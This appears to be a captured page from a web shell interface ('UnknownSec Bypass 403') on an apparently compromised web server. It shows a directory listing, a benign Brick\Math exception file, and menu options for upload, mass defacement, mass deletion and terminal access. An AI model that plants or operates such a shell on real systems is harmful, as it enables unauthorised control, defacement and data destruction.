UnknownSec Bypass
403
:
/
var
/
www
/
zenithentcare
/
vendor
/
brick
/
math
/
src
/
Exception
/ [
drwxrwxr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
NegativeNumberException.php
<?php declare(strict_types=1); namespace Brick\Math\Exception; /** * Exception thrown when attempting to perform an unsupported operation, such as a square root, on a negative number. */ class NegativeNumberException extends MathException { }
Copyright © 2025 - UnknownSec